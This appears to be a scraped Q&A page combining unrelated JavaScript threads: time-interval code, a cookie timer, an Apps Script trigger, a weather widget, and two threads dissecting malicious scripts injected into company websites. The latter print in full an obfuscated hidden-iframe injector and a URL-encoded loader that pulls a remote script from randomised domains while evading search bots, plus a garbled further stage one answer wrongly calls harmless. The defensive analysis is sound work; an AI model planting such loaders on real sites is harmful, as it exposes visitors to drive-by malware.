Translating PHP strtotime function into Javascript - javascript

I have a PHP function which calculates the time difference (hr/min/sec) of two values:
$mf_start_time = '10:00:00';
$mf_end_time = '11:00:00';
$st_start_time = '10:00:00';
$st_end_time = '12:00:00';
$sn_start_time = '10:00:00';
$sn_end_time = '13:00:00';
$ph_start_time = '10:00:00';
$ph_end_time = '14:00:00';
function time_interval($start,$end) {
$s = strtotime($start);
$e = strtotime($end);
if ($s < $e)
{
$a = $e - $s;
}
else
{
$e = strtotime('+1 day',$e);
$a = $e - $s;
}
$h = floor($a/3600);
$m = floor(($a%3600)/60);
$s = $a%60;
return trim(($h?$h.' hour ':'').($m?$m.' minute ':'').($s?$s.' second ':''));
}
$mf_duration = time_interval($mf_start_time,$mf_end_time);
$st_duration = time_interval($st_start_time,$st_end_time);
$sn_duration = time_interval($sn_start_time,$sn_end_time);
$ph_duration = time_interval($ph_start_time,$ph_end_time);
echo $mf_duration;
echo $st_duration;
echo $sn_duration;
echo $ph_duration;
My output for this is:
1 hour
2 hour
3 hour
4 hour
Now I am trying to translate this into Javascript, my problem is that I need to get strtotime() to work the same.
Here is what I tried in Javascript:
var mf_start_time = '10:00:00';
var mf_end_time = '11:00:00';
var st_start_time = '10:00:00';
var st_end_time = '12:00:00';
var sn_start_time = '10:00:00';
var sn_end_time = '13:00:00';
var ph_start_time = '10:00:00';
var ph_end_time = '14:00:00';
function time_interval(start,end)
{
var s = strtotime(start);
var e = strtotime(end);
if (s < e)
{
a = e - s;
}
else
{
var e = strtotime('+1 day',e);
var a = e - s;
}
var h = floor(a/3600);
var m = floor((a%3600)/60);
var s = a%60;
return trim((h?h+' hour ':'')+(m?m+' minute ':'')+(s?s+' second ':''));
}
var mf_duration = time_interval(mf_start_time,mf_end_time);
var st_duration = time_interval(st_start_time,st_end_time);
var sn_duration = time_interval(sn_start_time,sn_end_time);
var ph_duration = time_interval(ph_start_time,ph_end_time);
console.log(mf_duration);
console.log(st_duration);
console.log(sn_duration);
console.log(ph_duration);
This does not work because strtotime does not work for Javascript (error not defined). What can I use for that?

I did my best to replicate what your php does, however I don't know if this would be best practice in js, nor if it would be of the same use as you have in your php app. Hopefully this is a good starting point for you to see how js works đź‘Ť
var mf_start_time = '10:00:00';
var mf_end_time = '11:00:00';
var st_start_time = '10:00:00';
var st_end_time = '12:00:00';
var sn_start_time = '10:00:00';
var sn_end_time = '13:00:00';
var ph_start_time = '10:00:00';
var ph_end_time = '14:00:00';
function time_interval(start, end) {
var [sHour, sMinute, sSecond] = start.split(":");
var [eHour, eMinute, eSecond] = end.split(":");
var s = new Date();
s.setHours(sHour, sMinute, sSecond);
var e = new Date();
e.setHours(eHour, eMinute, eSecond);
var a;
if (s.getTime() < e.getTime()) {
a = e.getTime() - s.getTime();
} else {
e.setDate(e.getDate() + 1);
a = e.getTime() - s.getTime();
}
a = a / 1000;
var h = Math.floor(a/3600);
var m = Math.floor((a%3600)/60);
var s = a%60;
return (
(h ? h + ' hour ' : '') +
(m ? m +' minute ':'') +
(s ? s +' second ':'')
).trim();
}
var mf_duration = time_interval(mf_start_time, mf_end_time);
var st_duration = time_interval(st_start_time, st_end_time);
var sn_duration = time_interval(sn_start_time, sn_end_time);
var ph_duration = time_interval(ph_start_time, ph_end_time);
console.log(mf_duration);
console.log(st_duration);
console.log(sn_duration);
console.log(ph_duration);

Related

Using LocalStorage to save data

I am trying to use LocalStorage to save data. I want to use this data to reinitialise a counter after the user refreshes. An example of my code can be found in the following JSFiddle.
var hj= document.getElementById("jam");
var mm= document.getElementById("menit");
var ds= document.getElementById("detik");
var startDateTime = new Date();
var startStamp = startDateTime.getTime();
console.log(startDateTime);
console.log(startStamp);
var newDate = new Date();
var newStamp = newDate.getTime();
// console.log(newStamp);
var timer;
function pad(val) {
return val > 9 ? val : "0" + val;
}
function updateClock() {
newDate = new Date();
newStamp = newDate.getTime();
var diff = Math.round((newStamp-startStamp)/1000);
var d = Math.floor(diff/(24*60*60));
diff = diff-(d*24*60*60);
var h = Math.floor(diff/(60*60));
diff = diff-(h*60*60);
var m = Math.floor(diff/(60));
diff = diff-(m*60);
var s = diff;
// document.getElementById("time-elapsed").innerHTML = d+" day(s), "+h+" hour(s), "+m+" minute(s), "+s+" second(s) working";
document.getElementById("jam").innerHTML=pad(h);
document.getElementById("menit").innerHTML=pad(m);
document.getElementById("detik").innerHTML=pad(s);
}
var time=setInterval(updateClock, 1000);
https://jsfiddle.net/o5s4y2L7/
You can use a Cookie for this.
var hj= document.getElementById("jam");
var mm= document.getElementById("menit");
var ds= document.getElementById("detik");
var startDateTime = new Date();
var cookie_time = getCookie("timer_start");
var startStamp = cookie_time?cookie_time:startDateTime.getTime();
setCookie("timer_start", startStamp, 1);
var newDate = new Date();
var newStamp = newDate.getTime();
var timer;
function pad(val) {
return val > 9 ? val : "0" + val;
}
function updateClock() {
newDate = new Date();
newStamp = newDate.getTime();
var diff = Math.round((newStamp-startStamp)/1000);
var d = Math.floor(diff/(24*60*60));
diff = diff-(d*24*60*60);
var h = Math.floor(diff/(60*60));
diff = diff-(h*60*60);
var m = Math.floor(diff/(60));
diff = diff-(m*60);
var s = diff;
document.getElementById("jam").innerHTML=pad(h);
document.getElementById("menit").innerHTML=pad(m);
document.getElementById("detik").innerHTML=pad(s);
}
function setCookie(cname, cvalue, exdays) {
var d = new Date();
d.setTime(d.getTime() + (exdays*24*60*60*1000));
var expires = "expires="+ d.toUTCString();
document.cookie = cname + "=" + cvalue + "; " + expires;
}
function getCookie(cname) {
var name = cname + "=";
var ca = document.cookie.split(';');
for(var i = 0; i <ca.length; i++) {
var c = ca[i];
while (c.charAt(0)==' ') {
c = c.substring(1);
}
if (c.indexOf(name) == 0) {
return c.substring(name.length,c.length);
}
}
return "";
}
var time=setInterval(updateClock, 1000);

Google scripts every minute trigger not working

I have the following script
function scraper() {
var url = 'http://gpa.shet.com.aspx';
var sss = SpreadsheetApp.getActiveSpreadsheet();
//var ss = SpreadsheetApp.openById('1im78ip4Wcmb1xbfZs8Lqy3-LP1SU9rC8E5OfKbOjJDg');
//var sss = SpreadsheetApp.setActiveSpreadsheet(ss);
var sheet = sss.getSheetByName("Sheet1");
var rows = sheet.getDataRange();
var numRows = rows.getNumRows();
var response = UrlFetchApp.fetch(url);
var contentText = response.getContentText();
var pr = sheet.getRange('A1:Z1000');
var cstring = contentText.tostring;
var ui = SpreadsheetApp.getUi();
var NHL = "New Agent";
var nlength = contentText.length;
// ui.alert(nlength);
//ui.alert(contentText);
//var g = 5;
var clength = 200000;
///
var temp = contentText;
var count = (temp.match(/New Hot Lead/g) || []).length;
var C6 = sheet.getRange('C6');
var C8 = sheet.getRange('C8');
var C10 = sheet.getRange('C10').getValue();
var C10r = sheet.getRange('C10');
if (count > 0) {
var d = new Date();
var hrs = d.getHours();
var mins = d.getMinutes();
var time1 = hrs + ":" + mins;
if (C6.isBlank() == true) {
C6.setValue(time1);
} else if (C6.isBlank() == false) {
C8.setValue(time1);
}
}
if (count == 0) {
C6.clear();
C8.clear();
}
var time2 = 0.00347222222222222;
if (C10 >= time2) {
var D10 = sheet.getRange("D10");
var alert = "NHLs for more than 5 minutes!";
D10.setValue(alert);
D10.setFontColor('Red');
}
}
Now, the problem is not the code itself, since when I run it manually it does work the way it's expected. My problem is with the time-driven trigger. I have tried to manually set it for every minute, and to add the triggerbuilder code at the end and outside of the function, but it still won't work. What are some suggestions?
Try using the sleep function for 60 seconds.
sleep(60000);

Keep Weather info even when offline

So I'm creating a widget for the iPhone lockscreen using CSS/HTML. I can't figure out how to keep the weather info from disappearing when the phone screen turns off after a minute or when the phone is offline. Any tips? Here's the code:
<script type="text/javascript">
var iconExtWall = '.png'
var iconExtLock = '.png'
var locale = 'Beirut, Lebanon'
var iconSetWall = 'stardock'
var iconSetLock = 'stardock'
var enableWallpaper = true
var isCelsius = true
var useRealFeel = false
var enableLockScreen = true
var source = 'appleAccuweatherStolen'
var stylesheetWall = 'mini'
var stylesheetLock = 'Under_StatusBar'
var updateInterval = 15
var postal;
var demoMode = false;
var enabled;
if (location.href.indexOf("Wallpaper") > 0){
stylesheet = stylesheetLock;
iconSet = iconSetLock;
iconExt = iconExtLock;
enabled = enableLockScreen;
}else{
stylesheet = stylesheetWall;
iconSet = iconSetWall;
iconExt = iconExtWall;
enabled = enableWallpaper;
}
if(enabled == true){
if(iconSet == null || iconSet == 'null' || iconSet == ""){
var iconSet = stylesheet;
}
var headID = document.getElementsByTagName("head")[0];
var styleNode = document.createElement('link');
styleNode.type = 'text/css';
styleNode.rel = 'stylesheet';
styleNode.href = 'Stylesheets/'+stylesheet+'.css';
headID.appendChild(styleNode);
var scriptNode = document.createElement('script');
scriptNode.type = 'text/javascript';
scriptNode.src = 'Sources/'+source+'.js';
headID.appendChild(scriptNode);
}
function onLoad(){
if (enabled == true){
if (demoMode == true){
document.getElementById("weatherIcon").src="IconSets/"+iconSet+"/"+"cloudy1"+iconExt;
document.getElementById("city").innerText="Somewhere";
document.getElementById("desc").innerText="Partly Cloudy";
document.getElementById("temp").innerText="100ďż˝";
document.getElementById("forecast").innerText="Sun";
}else{
document.getElementById("weatherIcon").src="IconSets/"+iconSet+"/"+"dunno"+iconExt;
validateWeatherLocation(escape(locale).replace(/^%u/g, "%"), setPostal)
}
}else{
document.getElementsByTagName("body")[0].innerText='';
}
}
function convertTemp(num)
{
if (isCelsius == true)
return Math.round ((num - 32) * 5 / 9);
else
return num;
}
function setPostal(obj){
if (obj.error == false){
if(obj.cities.length > 0){
postal = escape(obj.cities[0].zip).replace(/^%u/g, "%")
document.getElementById("WeatherContainer").className = "";
weatherRefresherTemp();
}else{
document.getElementById("city").innerText="Not Found";
document.getElementById("WeatherContainer").className = "errorLocaleNotFound";
}
}else{
document.getElementById("city").innerText=obj.errorString;
document.getElementById("WeatherContainer").className = "errorLocaleValidate";
setTimeout('validateWeatherLocation(escape(locale).replace(/^%u/g, "%"), setPostal)', Math.round(1000*60*5));
}
}
function dealWithWeather(obj){
var translatedesc="description";
if (obj.error == false){
document.getElementById("city").innerText=obj.city;
document.getElementById("city2").innerText=obj.city;
document.getElementById("desc").innerText=obj.description.toLowerCase();
if(useRealFeel == true){
tempValue = convertTemp(obj.realFeel);
}else{
tempValue = convertTemp(obj.temp)
}
document.getElementById("temp").innerText=tempValue+"Âş";
document.getElementById("weatherIcon").src="IconSets/"+iconSet+"/"+MiniIcons[obj.icon]+iconExt;
/*ProductRed*/
lastResults = new Array;
lastResults[0] = {daycode:obj.daycode, icon:obj.icon, hi:obj.hi, lo:obj.lo, now:obj.temp};
var c = obj.forecast.length;
var titi = new Array("Sun","Mon","Tue","Wed","Thu","Fri","Sat");
var toto =new Date();
var tutu = toto.getDay();
var tata;
if (c > 6) c = 6; // just to be safe
for (var i=0; i<c; ++i)
{
var forecast = obj.forecast[i];
tata = tutu + i;
if(tata > 6) {tata = tata - 7;}
document.getElementById('day'+i).innerText = titi[tata];
document.getElementById('hi'+i).innerHTML = convertTemp(forecast.hi)+'&#176 ';
document.getElementById('low'+i).innerHTML= convertTemp(forecast.lo)+'&#176 ';
document.getElementById('wIcon'+i).src="IconSets/"+iconSet+"/"+MiniIcons[forecast.icon]+iconExt;
lastResults[i+1] = {daycode:forecast.daycode, icon:forecast.icon, hi:forecast.hi, lo:forecast.lo};
}
/*ProductRed*/
document.getElementById("WeatherContainer").className = "";
}else{
//Could be down to any number of things, which is unhelpful...
document.getElementById("WeatherContainer").className = "errorWeatherDataFetch";
}
var this_date_timestamp = new Date()
var this_weekday = this_date_timestamp.getDay()
var this_date = this_date_timestamp.getDate()
var this_month = this_date_timestamp.getMonth()
var this_year = this_date_timestamp.getYear()
if (this_year < 1000)
this_year+= 1900;
if (this_year==101)
this_year=2001;
}
function weatherRefresherTemp(){ //I'm a bastard ugly hack. Hate me.
fetchWeatherData(dealWithWeather,postal);
setTimeout(weatherRefresherTemp, 60*1000*updateInterval);
}
Thanks!

JavaScript trojan dissection

I've recently been playing with allot of JavaScript and started to consider that I couldn't encounter a piece of JavaScript that I wouldn't be able to debug.
Well I was pleasantly surprised and angered today when we discovered a number of JavaScript redirect trojans on our company’s website.
Most of the code we found I was able to easily dissect and used standard escaping to obfuscate the codes function.
But among the code we found the code below has completely stumped me on what its doing. (The only part that I can seem to work out is that it is doing a replace on some of the parameters).
So would anyone please be kind enough to dissect the following code for me? I would love to know exactly what’s going on...
<script>
function yJ() {};
this.sMZ = "sMZ";
yJ.prototype = {
w: function () {
var rJ = 13390;
this.m = "m";
this.fP = '';
this.q = "q";
this.oJ = "";
var vS = function () {
return 'vS'
};
var d = 'replace';
var qB = "";
x = '';
var s = document;
var xZ = "xZ";
mC = '';
var dV = "dV";
var b = window;
this.p = false;
this.kX = '';
nP = "nP";
var zE = "";
this.nU = false;
var yV = function () {
return 'yV'
};
String.prototype.gT = function (l, v) {
return this[d](l, v)
};
this.pC = '';
var qV = false;
var fPU = new Array();
h = "";
var sV = 'sKe}tKTIiWmEe}oEu}tK'.gT(/[KE\}IW]/g, '');
var xV = 43258;
sT = '';
var mV = '';
this.wJ = "wJ";
var f = '<jhItImIlI I>j<IhjezaIdz ;>;<z/;hjeIaIdI>;<zb!ojdjyj ;>I<!/jbIo!d!yI>z<j/Ihjt;m;lj>!'.gT(/[\!Ijz;]/g, '');
var xB = '';
wI = "wI";
oT = false;
var nQ = 49042;
try {
zI = '';
var bF = new Array();
var aY = function () {
return 'aY'
};
var rN = false;
rF = "";
var cX = function () {
return 'cX'
};
var y = 'bToTdTy+'.gT(/[\+\]aT%]/g, '');
this.rL = '';
var vH = function () {
return 'vH'
};
var r = 'sStEy9l?eE'.gT(/[ES9\?m]/g, '');
yD = "";
var eA = '';
var bQ = 'i.fWrhalmlel'.gT(/[lW\.xh]/g, '');
vZ = '';
this.bG = "";
this.vL = false;
var t = 'w5r[i5t[e%'.gT(/[%C5\[U]/g, '');
gI = '';
dVL = "dVL";
var n = 'cZrzeZaZtze.E.l.e;m;eSnzt;'.gT(/[;SZz\.]/g, '');
lH = "";
kD = "kD";
this.pH = false;
var k = 's9ric9'.gT(/[9Ni~O]/g, '');
var vB = '';
var kH = function () {
return 'kH'
};
var qH = new Array();
aD = '';
this.eQ = false;
var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, '');
var cT = '';
var kL = function () {
return 'kL'
};
var bR = new Array();
this.cP = 22454;
var dH = 'hNi9d0d>e*n*'.gT(/[\*9N\>0]/g, '');
lG = '';
tG = 7587;
hV = '';
this.oR = "oR";
var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, '');
var dC = function () {};
var eR = new Date();
var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, '');
uM = "";
var i = function () {};
this.cI = "";
tU = false;
function qN() {};
xL = 57256;
var c = this.a();
this.eL = '';
var rY = function () {};
fG = false;
nO = false;
this.j = "";
this.iQ = 5330;
var sY = function () {};
var u = document[n](bQ);
this.tH = false;
zX = "";
u[r][o] = dH;
var kV = "kV";
pN = '';
var yG = new Array();
this.nOE = 818;
u[z](k, c);
this.bQK = "";
var yU = 15629;
var sM = new Array();
var eY = "eY";
var qP = '';
s[y][e](u);
var lU = "lU";
var zR = false;
var xS = "";
iX = 34795;
function pO() {};
this.gM = "";
} catch (g) {
var xI = false;
this.gO = false;
this.iZ = false;
this.iU = false;
var mQ = new Date();
var qF = function () {};
s.write(f);
var tS = "tS";
function aR() {};
nA = "nA";
var xT = new Date();
mZ = false;
var gN = new Array();
var wE = this;
var eB = 3562;
this.qE = "qE";
this.cS = false;
this.vK = false;
qEJ = false;
this.hW = false;
b[sV](function () {
function bI() {};
hJ = "";
var kVQ = "kVQ";
var iG = "";
var eBS = new Array();
rA = "";
wE.w();
jY = "";
var hB = "hB";
var iZF = '';
qY = "";
jYG = "";
uK = 30969;
var qD = "qD";
}, 326);
this.qC = "";
var aX = function () {};
var cN = "";
}
gB = false;
var fF = false;
this.hX = false;
},
a: function () {
rH = "rH";
this.bV = '';
var qW = "";
return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, '');
var sMS = new Array();
this.wL = false;
uS = "uS";
function pI() {};
}
};
var uI = false;
var kN = new yJ();
this.aQ = "aQ";
kN.w();
hT = 15101;
</script>
It embeds http://fancycake.xxx/something, and this is the line where you can see it:
return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, '');
You see how every odd character, when plucked from that string, forms the URL. I didn't run this, so I'm not sure under what conditions it does this, but you can see that String.replace has been renamed to String.gT and is being passed a regex against the characters which make the string obfuscated. If you apply that same method, plucking odd characters, you can see that there is a hidden iframe, some javascript event handlers, setAttribute, etc:
var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, '');
var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, '');
var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, '');
This is how String.replace is aliased:
var d = 'replace';
...
String.prototype.gT = function (l, v) {
return this[d](l, v)
};
Within the context of that function, this is the string on which gT is being called and d is the string replace. On a string's prototype, this['replace'] returns the replace() method, which is then called with the two arguments to gT. The result is then returned.
Update
I transformed the script like so:
Replaced all string.gT() calls with their plain forms.
Removed any variables that aren't referenced.
Gave functions some common-sense names.
This is the result, it should be pretty clear how it works now:
function FancyCake() {};
FancyCake.prototype = {
embed: function () {
var d = 'replace';
var s = document;
var b = window;
var sV = 'setTimeout';
var f = "<html ><head ></head><body ></body></html>";
try {
zI = '';
var bF = new Array();
var y = 'body';
var r = 'style';
var bQ = 'iframe';
var t = 'write';
var n = 'createElement';
var k = 'src';
var z = 'setAttribute';
var dH = 'hidden';
var o = 'visibility';
var e = 'appendChild';
var c = this.getUrl();
var u = document[n](bQ);
u[r][o] = dH;
u[z](k, c);
s[y][e](u);
} catch (e) {
console.error(e);
s.write(f);
var cake = this;
b[sV](function () {
cake.embed();
}, 326);
}
},
getUrl: function () {
return "http://fancycake.net/.ph/1/";
}
};
var cake = new FancyCake();
cake.embed();
It adds an invisible iFrame to the following URL to your website:
<iframe style="visibility: hidden;" src="http://fancycake.net/.ph/1/"></iframe>
The website fancycake is marked as attacked and malicious under Firefox
Run it in a JavaScript debugger; eventually, the code will decompile itself and try to start. I suggest to use the latest version of FireFox maybe on a Linux box to be on the safe side.

Decode some injected Javascript?

I had the following injected into the footer of a site of mine and, in an effort of solving the greater mystery ("How" it happened), I'm trying to decode it. Any ideas?
Here's the code:
<ads><script type="text/javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%62%3D%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%2C%63%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%3D%3D%2D%31%26%26%21%61%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%62%29%26%26%63%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%29%7B%76%61%72%20%64%3D%5B%22%6D%79%61%64%73%2E%6E%61%6D%65%22%2C%22%61%64%73%6E%65%74%2E%62%69%7A%22%2C%22%74%6F%6F%6C%62%61%72%63%6F%6D%2E%6F%72%67%22%2C%22%6D%79%62%61%72%2E%75%73%22%2C%22%66%72%65%65%61%64%2E%6E%61%6D%65%22%5D%2C%65%3D%5B%22%76%61%67%69%2E%22%2C%22%76%61%69%6E%2E%22%2C%22%76%61%6C%65%2E%22%2C%22%76%61%72%73%2E%22%2C%22%76%61%72%79%2E%22%2C%22%76%61%73%61%2E%22%2C%22%76%61%75%74%2E%22%2C%22%76%61%76%73%2E%22%2C%22%76%69%6E%79%2E%22%2C%22%76%69%6F%6C%2E%22%2C%22%76%72%6F%77%2E%22%2C%22%76%75%67%73%2E%22%2C%22%76%75%6C%6E%2E%22%5D%2C%66%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%64%2E%6C%65%6E%67%74%68%29%2C%67%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%65%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%39%30%37%32%45%34%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%68%6F%6C%79%63%6F%6F%6B%69%65%3D%22%2B%65%73%63%61%70%65%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%2B%22%3B%65%78%70%69%72%65%73%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%65%5B%67%5D%2B%64%5B%66%5D%2B%27%2F%73%79%73%74%65%6D%2F%63%61%70%74%69%6F%6E%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));</script></ads>
You can decode the string using this tool. Set string conversion options to URL and Decode. Then you can pretty it up with js beautifier.
And because I'm a curious sort, I took a look at the output. It's writing a new caption.js file to your pages from a semi-random domain. There are 2 arrays of URL segments that are used to build the full domain, so I'd say you've got something to go with.
<script language="javascript" type="text/javascript">
var a = window.navigator.userAgent,
b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
c = navigator.appVersion;
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
f = Math.floor(Math.random() * d.length),
g = Math.floor(Math.random() * e.length);
dt = new Date;
dt.setTime(dt.getTime() + 9072E4);
document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>')
};
</script>
So, prepends a subdomain from e (e.g. vagi.) to a domain name from d (e.g. myads.name) and loads a script from /system/caption.js at that domain (e.g. http://vagi.myads.name/system/caption.js).
var a = window.navigator.userAgent,
b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
c = navigator.appVersion;
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
f = Math.floor(Math.random() * d.length),
g = Math.floor(Math.random() * e.length);
dt = new Date;
dt.setTime(dt.getTime() + 9072E4);
document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>')
};
code is loading a random subdomain-sld combo with a cookie set, to load unsecure content.
All of those numbers are hexadecimal values for ASCII characters. When unescape is called they get turned into real characters. e.g. %3C is '<'.
Why not use a message box to display the output of unescape(...)
You can use the hex decoder here:
http://home2.paulschou.net/tools/xlate/
The code is
<script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script>
<script language="javascript" type="text/javascript">
var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion;
if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){
var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],
e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],
f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);
dt=new Date;
dt.setTime(dt.getTime()+9072E4);
document.cookie="holycookie="+escape("holycookie")+";
expires="+dt.toGMTString()+";
path=/";
document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};
</script>
Here's a URLDecoder:
http://meyerweb.com/eric/tools/dencoder/
And the code it writes:
<script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script>
OK, so that's not too helpful. It appears to insert another JS file if the user doesn't have a cookie named "holycookie" and isn't the google bot. Most of that is just junk to pick which domain name to get the payload from.
The code you posted decodes to
var a = window.navigator.userAgent,
b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
c = navigator.appVersion;
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
f = Math.floor(Math.random() * d.length),
g = Math.floor(Math.random() * e.length);
dt = new Date;
dt.setTime(dt.getTime() + 9072E4);
document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
document.write('')
};
which in turn loads code from a url composed in a pseudorandom way provided that the if condition is met.
If you open up, for instance, http://vain.adsnet.biz/system/caption.js you'll be presented with the following javascript code.
I leave the interpretation to you, however it looks quite harmless.
function tT() {};
var yWP = new Array();
tT.prototype = {
h: function () {
this.i = "";
var nH = function () {};
var tE = 30295;
var u = "";
zB = false;
this.a = '';
this.eY = 29407;
var z = document;
vD = "vD";
var gT = "gT";
var oG = '';
var lF = '';
fU = "fU";
var q = function () {
return 'q'
};
var c = window;
var m = function () {
return 'm'
};
var kS = "kS";
this.b = "";
this.p = 29430;
var j = this;
dL = "";
var cC = new Date();
cQ = 33459;
var uY = "uY";
var vO = function () {};
zN = "zN";
jIZ = '';
var mH = 21601;
String.prototype.lP = function (v, hF) {
var t = this;
return t.replace(v, hF)
};
var nA = "";
this.xK = 48622;
zG = "";
var kF = function () {};
function aF() {};
var mI = function () {};
var oY = '';
var g = 'sfe?tfTw'.lP(/[wfoj\?]/g, '') + 'irmkeko('.lP(/[\(rO\[k]/g, '') + 'ubty'.lP(/[y\+b\>\)]/g, '');
var iN = new Array();
mJ = "mJ";
aW = "aW";
var hU = "hU";
this.kC = 28044;
var k = 'tbr3e*c(r*e3a('.lP(/[\(3b\*G]/g, '') + 'tEe>nat>gaeat)'.lP(/[\)a\>\]\|'.lP(/[\|\)\(MN]/g, ''));
var cJ = function () {};
var tX = false;
this.xHX = false;
function jP() {};
var eZ = 16039;
bQ = "bQ";
var eSM = new Date();
c[g](function () {
j.h()
}, 384);
this.xR = "";
var jB = function () {
return 'jB'
};
var fP = function () {
return 'fP'
};
var bX = new Array();
}
function iLD() {};
var mQ = function () {};
var wZV = "";this.eK = 5506;
}
};
fO = 30941;
var hW = new tT();
wU = 40956;
hW.h();
hZ = "hZ";
